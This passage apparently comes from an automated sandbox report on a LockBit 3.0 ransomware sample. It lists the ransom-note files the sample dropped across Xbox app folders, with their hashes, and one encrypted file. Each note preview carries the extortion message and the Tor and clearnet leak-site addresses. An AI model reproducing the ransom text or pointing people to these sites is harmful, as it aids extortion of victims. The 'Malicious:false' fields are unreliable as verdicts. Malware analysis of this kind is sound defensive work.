                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976673083880865
                Encrypted:false
                SSDEEP:192:ehCnD+UqbwDvtPIbn45HGBkJfKAITX6GPd2o+zo:ehC62Bwc5HGBPTqKdp+0
                MD5:12F6A0910CC151094FF81F69FF5266E2
                SHA1:DDFD5F91BD1EAED7CDC62FDC1C542AB09F05C15B
                SHA-256:B5726242087A06AF571240F81596FEAD6B907E6D64EE8FA4A2D99D48CDC8FA4F
                SHA-512:6DF3AD797602C4721D21433DF0CB208649132595E86E3C19D1A3FFEB2538D4EF5749E06CE4C8F24288DBCFA37AE5AF12E45F13E459EDE9D0E141BC271BA428D6
                Malicious:false
                Preview:Sb..k,|o.Q.....O....wd.."p.l.[.........2.K>[!F.t)vM.......m.TK...........J..<.s ..&..*.'.....k....5.4...x.".*'...5.........Og.....0.{...9...|Jj....t.e](2:.....16b...3..=.K.X.B...99/U.Q../....0ti...2..."L.......].ns...,.Z.v..e^..5.."...M.3,..Bb'.5..qL3{.........?..(n..9..d^....c..]L...0.~........`.1..*.....gg.4`.c.T..y....q...%'.+...7-..gUP;.8....$...9....4.....O........&@.....X...x..S\~.u.2..kB.^H.*..A.....#......5...].f.K.X..{"....BB......o....m"..s.!m.r..`+.TJ."..n.K...v.U...e..WoD......7...w.Ep..m........q.IPLzr._.m......k,.&......Sy..F!Zr8 .[A._.;.S...C.l.HA..S..V..K.._W.bt;.E4]..$.'.nv/.rB2.)..0.{.o:..r.....ww..H.z._...F.....H.a.....o....<.....-...zo..@.\.hGJ..]..\L..H.(...V.......1..}..;+.o...+nzf,...`..6...K.m..{...1......Y...NGp.u....ZJ.. .?)....i.e-.O.n....S..|Q.f....._.q......u.....jU2.8.t.R..X.h.<?..5E0..:.A.~.&..("...6.ZO...7_..U..?._...RC....<......A0......(b.)H..c.}q..FE.".......G..bZ.of.<a.&w.s...(x.A.....N._..

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
